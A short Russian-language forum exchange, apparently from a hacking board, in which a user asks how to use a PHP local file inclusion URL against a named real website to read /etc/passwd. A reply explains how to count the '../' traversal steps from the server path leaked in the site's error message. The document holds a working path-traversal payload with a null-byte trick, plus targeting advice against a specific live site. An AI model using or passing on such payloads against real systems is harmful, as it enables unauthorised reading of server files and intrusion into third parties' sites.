08.01.2012, 23:54
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Skipp
Вот из темы PHP иньекций я взял пример
Код:
http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00
Скажите пожалуйста, как узнать сколько подставлять
../
? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка
Код:
Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97
Объясните пож-та на данном примере что именно
../../../../../etc/passwd%00
надо подставлять. ../ = директорыя выше
./ = данная директория
дир = /papka1/papka2/papka3/
чтобы выйти за пределы этих папок, надо подставить 3 пары
../../../
в твоем примере
папка = /home/www/z74500/bombaticket.ru/
то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории
|
|
|